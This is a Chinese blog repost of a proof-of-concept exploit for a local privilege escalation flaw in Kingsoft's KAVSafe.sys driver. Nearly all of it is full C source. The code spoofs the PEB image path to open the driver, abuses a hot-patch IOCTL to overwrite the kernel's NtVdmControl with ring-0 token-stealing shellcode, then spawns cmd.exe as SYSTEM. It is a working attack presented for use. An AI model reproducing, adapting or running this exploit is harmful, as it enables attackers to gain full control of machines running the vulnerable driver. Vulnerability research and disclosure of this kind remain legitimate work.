ypc2010
ypc2010

Kingsoft 'KAVSafe.sys' Driver 本地权限提升漏洞

VULNERABLE PRODUCTS
#define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300 , 0x835 , METHOD_BUFFERED ,FILE_ANY_ACCESS)
typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)(
                          HANDLE ProcessHandle,
                          DWORD ProcessInformationClass,
                          PVOID ProcessInformation,
                          ULONG ProcessInformationLength,
                          PULONG ReturnLength
    );
typedef struct _STRING {
    USHORT Length;
    USHORT MaximumLength;
    PCHAR Buffer;
} STRING;
typedef STRING *PSTRING;
typedef struct _RTL_DRIVE_LETTER_CURDIR {
    USHORT Flags;
    USHORT Length;
    ULONG TimeStamp;
    STRING DosPath;
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef const UNICODE_STRING *PCUNICODE_STRING;
#define RTL_MAX_DRIVE_LETTERS 32
#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001
typedef struct _CURDIR {
    UNICODE_STRING DosPath;
    HANDLE Handle;
} CURDIR, *PCURDIR;
typedef struct _RTL_USER_PROCESS_PARAMETERS {
    ULONG MaximumLength;
    ULONG Length;
   
    ULONG Flags;
    ULONG DebugFlags;
   
    HANDLE ConsoleHandle;
    ULONG  ConsoleFlags;
    HANDLE StandardInput;
    HANDLE StandardOutput;
    HANDLE StandardError;
   
    CURDIR CurrentDirectory;        // ProcessParameters
    UNICODE_STRING DllPath;         // ProcessParameters
    UNICODE_STRING ImagePathName;   // ProcessParameters
    UNICODE_STRING CommandLine;     // ProcessParameters
    PVOID Environment;              // NtAllocateVirtualMemory
   
    ULONG StartingX;
    ULONG StartingY;
    ULONG CountX;
    ULONG CountY;
    ULONG CountCharsX;
    ULONG CountCharsY;
    ULONG FillAttribute;
   
    ULONG WindowFlags;
    ULONG ShowWindowFlags;
    UNICODE_STRING WindowTitle;     // ProcessParameters
    UNICODE_STRING DesktopInfo;     // ProcessParameters
    UNICODE_STRING ShellInfo;       // ProcessParameters
    UNICODE_STRING RuntimeData;     // ProcessParameters
    RTL_DRIVE_LETTER_CURDIR CurrentDirectores[ RTL_MAX_DRIVE_LETTERS ];
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
typedef struct _PEB {
    BOOLEAN InheritedAddressSpace;      // These four fields cannot change unless the
    BOOLEAN ReadImageFileExecOptions;   //
    BOOLEAN BeingDebugged;              //
    BOOLEAN SpareBool;                  //
    HANDLE Mutant;                      // INITIAL_PEB structure is also updated.
   
    PVOID ImageBaseAddress;
    PVOID Ldr;
    struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters;
} PEB, *PPEB;
typedef LONG KPRIORITY;
typedef struct _PROCESS_BASIC_INFORMATION {
    LONG ExitStatus;
    PVOID PebBaseAddress;
    ULONG_PTR AffinityMask;
    KPRIORITY BasePriority;
    ULONG_PTR UniqueProcessId;
    ULONG_PTR InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION;
typedef struct {
    ULONG   Unknown1;
    ULONG   Unknown2;
    PVOID   Base;
    ULONG   Size;
    ULONG   Flags;
    USHORT  Index;
    USHORT  NameLength;
    USHORT  LoadCount;
    USHORT  PathLength;
    CHAR    ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
    ULONG   Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} X_SYSTEM_MODULE_INFORMATION, *PX_SYSTEM_MODULE_INFORMATION;
typedef LONG (WINAPI *PNT_QUERY_SYSTEM_INFORMATION) (
                           LONG SystemInformationClass,
                         PVOID SystemInformation,
                           ULONG SystemInformationLength,
                           PULONG ReturnLength
    );
#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
typedef LONG (WINAPI *PNT_VDM_CONTROL) (
               ULONG Service,
               PVOID ServiceData
    );
VOID __declspec(naked) R0ShellCodeXP()
{
    __asm
    {
        mov eax,0xffdff124
        mov eax,[eax]
        mov esi ,dword ptr[eax+0x220]
        mov eax,esi
searchxp:
        mov eax,dword ptr[eax+0x88]
        sub eax,0x88
        mov edx,dword ptr[eax+0x84]
        cmp edx,4
        jnz searchxp
        mov eax,dword ptr[eax+0xc8]
        mov dword ptr[esi + 0xc8] , eax
        ret 8
    }
}
VOID NopNop()
{
    printf("nop!\n");
}
#include "malloc.h"
int main(int argc, char* argv[])
{
    printf("KSWebShield KAVSafe.sys <= 2010,04,14,609\n"
        "Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept\n"
        "2010-5-23\n"
        "By Lincoin \n\nPress Enter");
    HKEY hkey ;
    WCHAR InstallPath[MAX_PATH];
    DWORD datatype ;
    DWORD datasize = MAX_PATH * sizeof(WCHAR);
    ULONG oldlen ;
    PVOID pOldBufferData = NULL ;
    if (RegOpenKey(HKEY_LOCAL_MACHINE , "SOFTWARE\\Kingsoft\\KSWSVC", &hkey) == ERROR_SUCCESS)
    {
        if (RegQueryValueExW(hkey , L"ProgramPath" , NULL , &datatype , (LPBYTE)InstallPath , &datasize) != ERROR_SUCCESS)
        {
            RegCloseKey(hkey);
            printf("KSWebShield not installed\n");
            getchar();
            return 0 ;
        }
        RegCloseKey(hkey);
    }
    else
    {
        printf("KSWebShield not installed\n");
        getchar();
        return 0 ;
    }
    wcscat(InstallPath , L" \\kavinst.exe");

    PROCESS_BASIC_INFORMATION pbi ;
    PNT_QUERY_INFORMATION_PROCESS pNtQueryInformationProcess ;
   
    pNtQueryInformationProcess = (PNT_QUERY_INFORMATION_PROCESS)GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryInformationProcess");
   
    pNtQueryInformationProcess(NtCurrentProcess() , 0 , &pbi , sizeof(pbi) , NULL);
    PPEB peb ;
    peb = (PPEB)pbi.PebBaseAddress;
    oldlen = peb->ProcessParameters->ImagePathName.Length;
    peb->ProcessParameters->ImagePathName.Length = wcslen(InstallPath) * sizeof(WCHAR);
    pOldBufferData = malloc(peb->ProcessParameters->ImagePathName.Length);
    RtlCopyMemory(pOldBufferData,peb->ProcessParameters->ImagePathName.Buffer , peb->ProcessParameters->ImagePathName.Length);
    RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , InstallPath ,peb->ProcessParameters->ImagePathName.Length );
    HANDLE hdev = CreateFile(" \\\\.\\KAVSafe" ,
        FILE_READ_ATTRIBUTES ,
        FILE_SHARE_READ ,
        0,
        OPEN_EXISTING ,
        0,
        0);
    if (hdev==INVALID_HANDLE_VALUE)
    {
        printf("cannot open device %u\n", GetLastError());
        getchar();
        return 0 ;
    }
    RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , pOldBufferData,peb->ProcessParameters->ImagePathName.Length);
    peb->ProcessParameters->ImagePathName.Length = (USHORT)oldlen ;
   
    PNT_QUERY_SYSTEM_INFORMATION pNtQuerySystemInformation  ;
    pNtQuerySystemInformation = (PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtQuerySystemInformation");
    X_SYSTEM_MODULE_INFORMATION sysmod ;
    HMODULE KernelHandle ;
    pNtQuerySystemInformation(0xb, &sysmod, sizeof(sysmod), NULL);
   
    KernelHandle = LoadLibrary(strrchr(sysmod.Module[0].ImageName, '\\') + 1);
   
    if (KernelHandle == 0 )
    {
        printf("cannot load ntoskrnl!\n");
        getchar();
        return 0 ;
    }
    PVOID pNtVdmControl = GetProcAddress(KernelHandle , "NtVdmControl");
    if (pNtVdmControl == 0 )
    {
        printf("cannot find NtVdmControl!\n");
        getchar();
        return 0 ;        
    }
    pNtVdmControl = (PVOID)((ULONG)pNtVdmControl - (ULONG)KernelHandle  );
    printf("NtVdmControl = %08x" , pNtVdmControl );
   
    getchar();
    ULONG ShellCodeSize = (ULONG)NopNop - (ULONG)R0ShellCodeXP;
    ULONG pShellCode = (ULONG)R0ShellCodeXP;

    PVOID Data = malloc(0x48 + ShellCodeSize);
    CopyMemory((PVOID)((ULONG)Data + 0x48) , R0ShellCodeXP , ShellCodeSize);
   
   
   
    CHAR ModuleName[68]= "ntoskrnl.exe" ;
    RtlCopyMemory( Data , ModuleName , sizeof(ModuleName));
    *(ULONG*)((ULONG)Data + 64) = (ULONG)pNtVdmControl;
    *(ULONG*)((ULONG)Data + 68) = ShellCodeSize ;
   
    ULONG btr ;
    if (!DeviceIoControl(hdev ,
        IOCTL_HOTPATCH_KERNEL_MODULE ,
        Data ,
        0x48 + ShellCodeSize ,
        NULL ,
        0,
        &btr , 0
        ))
    {
        printf("cannot device io control!%u\n" , GetLastError());
        getchar();
        return 0;
    }
    CloseHandle(hdev);
    PNT_VDM_CONTROL pR3NtVdmControl = (PNT_VDM_CONTROL)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtVdmControl");
    pR3NtVdmControl(0,0);
   
    WinExec("cmd.exe" , SW_SHOW);
    printf("OK!\n ");
    getchar();
    return 0;
}
原文网址: http://www.upx8.com/article.asp?id=647

你可能感兴趣的:(漏洞,职场,休闲,Kingsoft,本地权限)

  • 通过python实现发送钉钉个人工作通知 白白不白zab pyhtonpython钉钉开发语言
    一、钉钉官方开放文档https://open.dingtalk.com/document/isvapp/before-you-start在开发前需要看一遍官方开放文档的相关内容,来避免一些奇奇怪怪的问题出现,比如新旧版接口域名变更,请求方式不同、调用频率限制、是否开放对应接口权限、白名单等等。二、开发前准备首先开发使用的账号需要有钉钉管理员权限在钉钉后台自建应用获取应用AGENT_ID,APP_K
  • vue 前端显示图片加token_手摸手,带你用vue撸后台 系列二(登录权限篇) weixin_39562579 vue前端显示图片加tokenvue本地存储vue编辑页面和新增
    完整项目地址:vue-element-adminhttps://github.com/PanJiaChen/vue-element-admin前言拖更有点严重,过了半个月才写了第二篇教程。无奈自己是一个业务猿,每天被我司的产品虐的死去活来,之前又病了一下休息了几天,大家见谅。进入正题,做后台项目区别于做其它的项目,权限验证与安全性是非常重要的,可以说是一个后台项目一开始就必须考虑和搭建的基础核心功
  • python发送钉钉消息,发送个人到工作通知 夜语醉星辰 Pythonpython钉钉开发语言
    需求,钉钉消息通知不能发到群里,需要发送到个人。一、钉钉企业后台创建应用1、进入钉钉管理后台,创建应用2、记住ID等应用的信息,在后面需要用到3、设置允许对接的IP,需要公网IP4、设置权限,通讯录权限全选申请二、编写代码,通过手机号发送信息importrequestsimporttkinterastk#第一步:获取access_tokendefget_access_token(app_key,a
  • 周末总结(2024/01/11) 全栈黎明 日记
    工作人际关系核心实践:要学会随时回应别人的善意,执行时间控制在5分钟以内坚持每天早会打招呼遇到接不住的话题时拉低自己,抬高别人(无阴阳气息)朋友圈点赞控制在5min以内,职场社交不要放在5min以外职场的人际关系在面对利益冲突是直接质疑,要快准狠,不要内耗、回复消息要控制在30mins之内,一定要及时回复每周抽出10mins时间用来反思人际关系不能当面揭别人的短,这会显得自己情商很低三分假,七分真
  • 周末总结(2024/01/18) 全栈黎明 日记
    工作人际关系核心实践:要学会随时回应别人的善意,执行时间控制在5分钟以内坚持每天早会打招呼遇到接不住的话题时拉低自己,抬高别人(无阴阳气息)朋友圈点赞控制在5min以内,职场社交不要放在5min以外职场的人际关系在面对利益冲突是直接质疑,要快准狠,不要内耗、回复消息要控制在30mins之内,一定要及时回复每周抽出10mins时间用来反思人际关系不能当面揭别人的短,这会显得自己情商很低三分假,七分真
  • 躺着敲代码第二天-----聊聊Spring的AOP(面向切面编程) 想躺着敲代码^^ springjava
    AOP(Aspectorientedprogramming)什么是AOPAOP(AspectOrientedProgramming)即面向切面编程,AOP是OOP(面向对象编程)的一种延续,二者互补,并不对立。AOP的目的是将横切关注点(如日志记录、事务管理、权限控制、接口限流、接口幂等等)从核心业务逻辑中分离出来,通过动态代理、字节码操作等技术,实现代码的复用和解耦,提高代码的可维护性和可扩展性
  • Linux 部署 Java 项目:Tomcat、Redis、MySQL 教程 lingllllove javalinuxtomcat
    在Linux服务器上部署Java项目通常需要配置应用服务器(如Tomcat)、数据库(如MySQL)和缓存服务器(如Redis)。本文将详细介绍如何在Linux环境中部署一个Java项目,涵盖Tomcat、Redis和MySQL的安装与配置。一、准备工作在开始之前,确保你拥有以下条件:一台运行Linux的服务器(本文以Ubuntu为例)。具有sudo权限的用户。安装好Java环境(JDK)。安装J
  • Python之数据库操作 初宸 pythonmysqlpython数据库
    Python标准数据库接口为PythonDB-API,PythonDB-API为开发人员提供了数据库应用编程接口。PythonDB-API使用流程:引入API模块获取与数据库的连接执行SQL语句和存储过程关闭数据库连接文章目录MySQLdb创建数据库及表创建数据库:创建数据库表:修改数据库的访问权限(1)修改root的登录限制(2)创建新用户pymysql使用导入pymysql模块连接到数
  • Linux创建用户组并分配用户权限 清梦压星河_Ciao LinuxDockerlinuxdocker
    一、如何创建用户组在Linux系统中,创建用户组可以使用groupadd命令。以下是创建用户组的具体步骤和常用选项:1.创建用户组groupaddgroupnamegroupname是你希望创建的用户组名称。该命令将创建一个新的用户组,默认情况下,组的GID(组ID)会由系统自动分配。示例:groupadddevelopers这会创建一个名为developers的用户组。2.指定GID(组ID)如
  • 网络安全 | 0day漏洞介绍 Andya_net 网络安全技术web安全安全网络
    关注:CodingTechWork引言  在网络安全领域,0day漏洞(Zero-dayVulnerability)是指一个尚未被厂商、开发者或安全人员发现、修复或发布修补程序的安全漏洞。0day漏洞是黑客利用的一个重要攻击工具,因其未被披露或未被修复,给系统和网络带来了极大的安全风险。本博客将详细介绍0day漏洞的原理、危害、常见防护策略和应用场景,帮助大家理解并应对0day漏洞。0day漏洞介
  • Hive数据仓库中的数据导出到MySQL的数据表不成功 sin2201 出错问题数据仓库hivemysql
    可能的原因:(1)没有下载flume和sqoop(2)权限问题:因为MySQL数据库拒绝了root用户从hadoop3主机的连接请求,root用户没有从hadoop3主机进行连接的权限解决:通过MySQL的授权命令来授予权限mysql>GRANTALLPRIVILEGESONsqoop_weblog.*TO'root'@'hadoop3'IDENTIFIEDBY'2020';QueryOK,0ro
  • fuadmin jcsx 开源学习djangovue.js
    fu-admin-web采用VUE3,TS开发。fu-admin-backend采用Python,Django和Django-Ninija开发。数据库支持MySql,SqlServer,Sqlite。‍‍前端采用VbenAdmin、Vue3、AntDesignVue。后端采用Python语言Django框架以及强大的DjangoNinja。支持加载动态权限菜单,多方式轻松权限控制。Vue2项目移步
  • 虹膜识别和人脸识别存在信息安全问题吗? 烁月_o9 其他安全web安全网络
    虹膜识别和人脸识别都存在信息安全问题。虹膜识别的信息安全问题•数据存储风险:虹膜识别系统需要存储用户的虹膜模板数据。如果存储服务器的安全防护措施不足,黑客可能会入侵服务器,窃取这些高度敏感的虹膜数据。一旦数据泄露,黑客就有可能利用这些数据伪造身份,绕过虹膜识别系统。•设备安全漏洞:虹膜识别设备本身可能存在安全漏洞。例如,某些设备可能会受到恶意软件的攻击。这些恶意软件可以篡改设备的固件,在用户进行虹
  • package.json依赖包漏洞之yargs-Parser输入验证错误漏洞 漏洞安全
    背景有个安全扫描的流水线,扫描了负责的项目之后,发现一些漏洞。需要说明的是,这个扫描只是针对package.json文件。扫的是依赖树,而不是项目源代码,也不是打包后的代码。但既然是漏洞,都是可以好好学习下的。yargs-Parser输入验证错误漏洞(CVE-2020-7608)被扫描出来的是下面这样的:详情请查看:package.json依赖包漏洞之yargs-Parser输入验证错误漏洞
  • package.json依赖包漏洞之nodejs-glob-parent正则表达式拒绝服务漏洞 漏洞安全前端
    背景有个安全扫描的流水线,扫描了负责的项目之后,发现一些漏洞。需要说明的是,这个扫描只是针对package.json文件,扫的是依赖树,而不是项目源代码,也不是打包后的代码。但既然是漏洞,都是可以好好学习下的。nodejs-glob-parent正则表达式拒绝服务漏洞(CVE-2020-28469)被扫描出来的是下面这样的:从阿里云漏洞库中可以知道具体是什么漏洞。CVE-2020-28469漏洞的
  • 咱们继续学Java——高级篇 第二百五十五篇:之Java进阶之本地方法:Windows注册表访问代码的终极解读 一杯年华@编程空间 咱们继续学java高级篇mavenjava-eespringbootspringcloudhibernatetomcat
    咱们继续学Java——高级篇第二百五十五篇:之Java进阶之本地方法:Windows注册表访问代码的终极解读在Java学习的道路上,我们不断追求代码理解的深度,每一次对复杂代码的终极解读都是成长的重要里程碑。我写这篇博客的目的,就是希望与大家一同深入剖析Java本地方法中访问Windows注册表的剩余关键代码,助力大家在Java与其他语言交互编程领域掌握最核心的技能。今天,我们将详细解读Win32
  • 实际开发中的有趣bug:“undefined“ is not valid JSON SyntaxError: “undefined“ is not valid JSON。 我爱加班、、 vue项目实际开发中的bugvuexbugjson前端javascriptvue.jsecmascriptajax
    bug解读:指出在尝试解析或序列化JSON数据时遇到了问题。JSON(JavaScriptObjectNotation)是一种轻量级的数据交换格式,它要求数据必须是有效的JSON格式。在JavaScript中,undefined是一个特殊的值,表示变量没有被赋值,它不是一个有效的JSON值。场景:在后台项目,用户登录后,通过用户的菜单权限渲染侧边栏菜单,做了持久化存储。当登出后,在登录页刷新页面,
  • vue-cli项目中使用Electron 骆驼Lara Vuevue.jselectronjavascript
    Vue项目中使用Electron一、安装二、创建background.js三、创建preload.js文件四、修改package.json文件五、修改vue.config.js文件六、启动1本地启动2打包补充:一、安装安装electron,electron-builder,vue-cli-plugin-electron-builder,electron-devtoolsnpmi--save-dev
  • 深度解析 Git 的使用:版本控制的核心工具 qq_39279448 git
    1.Git的基本概念1.1什么是版本控制?版本控制系统(VersionControlSystem,VCS)是一种用于记录文件内容变更历史的工具。多人开发者可以在不同的时间编辑同一个文件,而不必担心覆盖或丢失他人的修改。Git作为一种分布式版本控制系统,允许开发者在本地操作代码的同时,确保所有更改都可以被追踪和协同。1.2分布式与集中式的差异集中式版本控制(例如SVN):所有代码和版本信息都存储在中
  • SpringBoot继承JWT token实现权限的验证(从头开始) CodeGuruInk springbootjava后端
    目录概述前提:我们需要知道的文件的用处第1步:数据库的连接第2步:定义一个标准化响应对象的类第3步:编写请求数据库数据代码第4步:自定义异常处理第5步:导入依赖第6步:自定义拦截器第7步:配置拦截器第8步:生成token第9步:开始测试代码第10步:vue请求示例扩展:自定义注解AuthAccess总结概述在开发后端接口时,数据的直接暴露可能会导致安全问题。为了应对这种情况,我们需要在访问接口时进
  • 成功使用devpi搭建PyPI缓存源,建立内网python安装包服务器(通过代理上网) jcsx 基础运维知识库开源学习pythonpipnginx
    前言缓存源和镜像源的区别:缓存源:初始状态为空。下载请求的软件包没有缓存,则回源到设置的上游镜像源,然后该软件包会被缓存。如果请求的软件包已经被缓存,则直接从本地缓存返回用户。下载速度:第一次速度=通过外网从上游镜像源下载的速度;之后的速度=内网带宽速度。磁盘空间:少。初始时只保存了软件包索引,随着使用过程,软件包被缓存,磁盘占用逐渐变大。镜像源:初始状态含有所有软件包,并且定时与上游镜像源同步。
  • 【Jenkins】持续集成与交付 (五):Jenkins用户权限管理 Seal^_^ 【云原生】容器化与编排技术持续集成#JenkinsjenkinsJenkins用户权限管理配置JenkinsJenkins用户的权限持续集成与交付
    【Jenkins】持续集成与交付(五):Jenkins用户权限管理1、安装插件(Role-basedAuthorizationStrategy)2、开启权限全局安全配置3、创建角色4、创建用户5、给用户分配角色6、测试权限TheBegin点点关注,收藏不迷路1、安装插件(Role-basedAuthorizationStrategy)首先,我们需要安装Role-basedAuthorization
  • 流媒体直播实时视频延迟时间排查和剖析:gop关键帧间隔导致延迟,流媒体和播放器缓存,B帧等导致的延迟 eguid_1 #1.4.3版本)直播延迟视频延迟直播平台播放延迟网络延迟
    本章是流媒体直播实时视频延迟时间排查和剖析javaCV系列文章:javacv开发详解之1:调用本机摄像头视频javaCV开发详解之2:推流器实现,推本地摄像头视频到流媒体服务器以及摄像头录制视频功能实现(基于javaCV-FFMPEG、javaCV-openCV)javaCV开发详解之3:收流器实现,录制流媒体服务器的rtsp/rtmp视频文件(基于javaCV-FFMPEG)
  • 基于大语言模型构建本地个人AI助理 由数入道 人工智能语言模型自然语言处理
    在构建本地专属的个人AI助理时,我们需要处理多个方面的技术需求,确保其在多模态数据处理、实时查询、灵活推理、知识图谱更新等方面具备高效性、实时性和可扩展性。以下探讨如何基于大语言模型构建一个具备全面功能的个人AI助理,涵盖知识库管理、动态推理、用户交互、实时学习和跨模态集成等关键技术。一、技术设计总体架构1.目标与需求个性化AI助理:构建一个本地专属AI助理,能够处理多种输入格式(文本、图像、音频
  • ChatGPT:AI写作中的初级搭档的思考 代码无疆 ChatgptchatgptAI写作人工智能
    在当前的AI浪潮中,ChatGPT无疑是一颗璀璨的明星。然而,尽管其能力卓越,但我们也必须正视它的定位——它更像是一个在AI写作领域刚刚踏入职场的“初级搭档”,而非经验丰富的全职员工。ChatGPT的强项在于其强大的通用性和云共享能力,这使得它能够快速响应各种需求。然而,其概率生成和记忆短暂的特点也暴露了它的不足。它缺乏丰富的“面向读者写作”的经验,当我们给予它一个宽泛的指令时,它往往会返回一个相
  • 用 Docker 搭建 Spark 集群 yeasy BigdataDockersparkDocker云计算集群分布式计算
    简介Spark是Berkeley开发的分布式计算的框架,相对于Hadoop来说,Spark可以缓存中间结果到内存而提高某些需要迭代的计算场景的效率,目前收到广泛关注。熟悉Hadoop的同学也不必担心,Spark很多设计理念和用法都跟Hadoop保持一致和相似,并且在使用上完全兼容HDFS。但是Spark的安装并不容易,依赖包括Java、Scala、HDFS等。通过使用Docker,可以快速的在本地
  • rockylinux9.4单master节点k8s1.28集群部署 大白菜和MySQL k8s集群kubernetes容器云原生
    kubernetes集群部署常见的k8s部署方式包括:二进制包、kubeadm工具、云服务提供商、或通过一些开源的工具搭建,例如:sealos、kuboard、Runcher、kubeSphere。本文使用kubeadm的部署方式,部署k8s1.28版本我本地安装资源规划如下:IP地址主机名称角色操作系统主机配置参考192.168.3.92master1masterrockylinux9.4(最小
  • ubuntu server连接wifi教程 HermanYe996 Ubuntulinuxubuntulinux运维
    ConfigUbuntuServerconfig_ubuntu_server脚本允许在RaspberryPi系统上快速轻松地配置Ubuntu服务器。它包括root权限设置和SSH配置,无需手动获取IP。使用“config_ubuntu_server”项目在您的RaspberryPi系统上配置Ubuntu服务器的麻烦。这个方便的工具通过一步配置简化了过程,包括root权限设置和SSH配置,无需手动获
  • JavaScript原型链污染漏洞分析 漏洞安全
    原型链污染漏洞CVE:1、yargs-Parser输入验证错误漏洞(CVE-2020-7608)2、tough-cookie安全漏洞(CVE-2023-26136)3、JSON5原型污染漏洞(CVE-2022-46175)漏洞描述:1、yargs-Parser输入验证错误漏洞(CVE-2020-7608):yargs-parser是一款选项解析器。yargs-parser13.1.2之前版本、14
  • Nginx部署前端Vue项目的深度解析 egekm_sefg 前端vue.jsnginx
    目录一、准备工作1.1开发环境1.2服务器环境1.3Nginx安装二、构建Vue项目三、上传静态文件到服务器四、配置Nginx五、测试并重新加载Nginx六、访问Vue应用七、高级配置7.1启用HTTPS7.2启用Gzip压缩7.3缓存控制八、常见问题与解决方案8.1404错误8.2权限问题8.3跨域问题九、总结在现代Web开发中,Vue.js因其组件化、响应式数据绑定和易于上手的特点,成为了前端
  • 基本数据类型和引用类型的初始值 3213213333332132 java基础
    package com.array; /** * @Description 测试初始值 * @author FuJianyong * 2015-1-22上午10:31:53 */ public class ArrayTest { ArrayTest at; String str; byte bt; short s; int i; long
  • 摘抄笔记--《编写高质量代码:改善Java程序的151个建议》 白糖_ 高质量代码
            记得3年前刚到公司,同桌同事见我无事可做就借我看《编写高质量代码:改善Java程序的151个建议》这本书,当时看了几页没上心就没研究了。到上个月在公司偶然看到,于是乎又找来看看,我的天,真是非常多的干货,对于我这种静不下心的人真是帮助莫大呀。           看完整本书,也记了不少笔记
  • 【备忘】Django 常用命令及最佳实践 dongwei_6688 django
    注意:本文基于 Django 1.8.2 版本   生成数据库迁移脚本(python 脚本) python manage.py makemigrations polls  说明:polls 是你的应用名字,运行该命令时需要根据你的应用名字进行调整   查看该次迁移需要执行的 SQL 语句(只查看语句,并不应用到数据库上): python manage.p
  • 阶乘算法之一N! 末尾有多少个零 周凡杨 java算法阶乘面试效率
                                     &n
  • spring注入servlet g21121 Spring注入
    传统的配置方法是无法将bean或属性直接注入到servlet中的,配置代理servlet亦比较麻烦,这里其实有比较简单的方法,其实就是在servlet的init()方法中加入要注入的内容: ServletContext application = getServletContext(); WebApplicationContext wac = WebApplicationContextUtil
  • Jenkins 命令行操作说明文档 510888780 centos
    假设Jenkins的URL为http://22.11.140.38:9080/jenkins/ 基本的格式为 java 基本的格式为 java -jar jenkins-cli.jar [-s JENKINS_URL] command [options][args] 下面具体介绍各个命令的作用及基本使用方法 1. &nb
  • UnicodeBlock检测中文用法 布衣凌宇 UnicodeBlock
    /**  * 判断输入的是汉字  */ public static boolean isChinese(char c) {        Character.UnicodeBlock ub = Character.UnicodeBlock.of(c);    
  • java下实现调用oracle的存储过程和函数 aijuans javaorale
    1.创建表:STOCK_PRICES     2.插入测试数据:     3.建立一个返回游标:  PKG_PUB_UTILS   4.创建和存储过程:P_GET_PRICE     5.创建函数:   6.JAVA调用存储过程返回结果集 JDBCoracle10G_INVO
  • Velocity Toolbox antlove 模板toolboxvelocity
    velocity.VelocityUtil package velocity; import org.apache.velocity.Template; import org.apache.velocity.app.Velocity; import org.apache.velocity.app.VelocityEngine; import org.apache.velocity.c
  • JAVA正则表达式匹配基础 百合不是茶 java正则表达式的匹配
      正则表达式;提高程序的性能,简化代码,提高代码的可读性,简化对字符串的操作   正则表达式的用途; 字符串的匹配 字符串的分割 字符串的查找 字符串的替换       正则表达式的验证语法     [a] //[]表示这个字符只出现一次 ,[a] 表示a只出现一
  • 是否使用EL表达式的配置 bijian1013 jspweb.xmlELEasyTemplate
            今天在开发过程中发现一个细节问题,由于前端采用EasyTemplate模板方法实现数据展示,但老是不能正常显示出来。后来发现竟是EL将我的EasyTemplate的${...}解释执行了,导致我的模板不能正常展示后台数据。         网
  • 精通Oracle10编程SQL(1-3)PLSQL基础 bijian1013 oracle数据库plsql
    --只包含执行部分的PL/SQL块 --set serveroutput off begin dbms_output.put_line('Hello,everyone!'); end; select * from emp; --包含定义部分和执行部分的PL/SQL块 declare v_ename varchar2(5); begin select
  • 【Nginx三】Nginx作为反向代理服务器 bit1129 nginx
    Nginx一个常用的功能是作为代理服务器。代理服务器通常完成如下的功能:   接受客户端请求 将请求转发给被代理的服务器 从被代理的服务器获得响应结果 把响应结果返回给客户端 实例 本文把Nginx配置成一个简单的代理服务器 对于静态的html和图片,直接从Nginx获取 对于动态的页面,例如JSP或者Servlet,Nginx则将请求转发给Res
  • Plugin execution not covered by lifecycle configuration: org.apache.maven.plugin blackproof maven报错
    转:http://stackoverflow.com/questions/6352208/how-to-solve-plugin-execution-not-covered-by-lifecycle-configuration-for-sprin   maven报错: Plugin execution not covered by lifecycle configuration:
  • 发布docker程序到marathon ronin47 docker 发布应用
    1 发布docker程序到marathon 1.1 搭建私有docker registry 1.1.1 安装docker regisry docker pull docker-registry docker run -t -p 5000:5000 docker-registry 下载docker镜像并发布到私有registry docker pull consol/tomcat-8.0
  • java-57-用两个栈实现队列&&用两个队列实现一个栈 bylijinnan java
    import java.util.ArrayList; import java.util.List; import java.util.Stack; /* * Q 57 用两个栈实现队列 */ public class QueueImplementByTwoStacks { private Stack<Integer> stack1; pr
  • Nginx配置性能优化 cfyme nginx
    转载地址:http://blog.csdn.net/xifeijian/article/details/20956605   大多数的Nginx安装指南告诉你如下基础知识——通过apt-get安装,修改这里或那里的几行配置,好了,你已经有了一个Web服务器了。而且,在大多数情况下,一个常规安装的nginx对你的网站来说已经能很好地工作了。然而,如果你真的想挤压出Nginx的性能,你必
  • [JAVA图形图像]JAVA体系需要稳扎稳打,逐步推进图像图形处理技术 comsci java
         对图形图像进行精确处理,需要大量的数学工具,即使是从底层硬件模拟层开始设计,也离不开大量的数学工具包,因为我认为,JAVA语言体系在图形图像处理模块上面的研发工作,需要从开发一些基础的,类似实时数学函数构造器和解析器的软件包入手,而不是急于利用第三方代码工具来实现一个不严格的图形图像处理软件......   &nb
  • MonkeyRunner的使用 dai_lm androidMonkeyRunner
    要使用MonkeyRunner,就要学习使用Python,哎 先抄一段官方doc里的代码 作用是启动一个程序(应该是启动程序默认的Activity),然后按MENU键,并截屏 # Imports the monkeyrunner modules used by this program from com.android.monkeyrunner import MonkeyRun
  • Hadoop-- 海量文件的分布式计算处理方案 datamachine mapreducehadoop分布式计算
    csdn的一个关于hadoop的分布式处理方案,存档。 原帖:http://blog.csdn.net/calvinxiu/article/details/1506112。     Hadoop 是Google MapReduce的一个Java实现。MapReduce是一种简化的分布式编程模式,让程序自动分布到一个由普通机器组成的超大集群上并发执行。就如同ja
  • 以資料庫驗證登入 dcj3sjt126com yii
    以資料庫驗證登入 由於 Yii 內定的原始框架程式, 採用綁定在UserIdentity.php 的 demo 與 admin 帳號密碼:    public function authenticate()    {        $users=array( &nbs
  • github做webhooks:[2]php版本自动触发更新 dcj3sjt126com githubgitwebhooks
    上次已经说过了如何在github控制面板做查看url的返回信息了。这次就到了直接贴钩子代码的时候了。 工具/原料 git github 方法/步骤   在github的setting里面的webhooks里把我们的url地址填进去。   钩子更新的代码如下: error_reportin
  • Eos开发常用表达式 蕃薯耀 Eos开发Eos入门Eos开发常用表达式
    Eos开发常用表达式 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2014年8月18日 15:03:35 星期一     &
  • SpringSecurity3.X--SpEL 表达式 hanqunfeng SpringSecurity
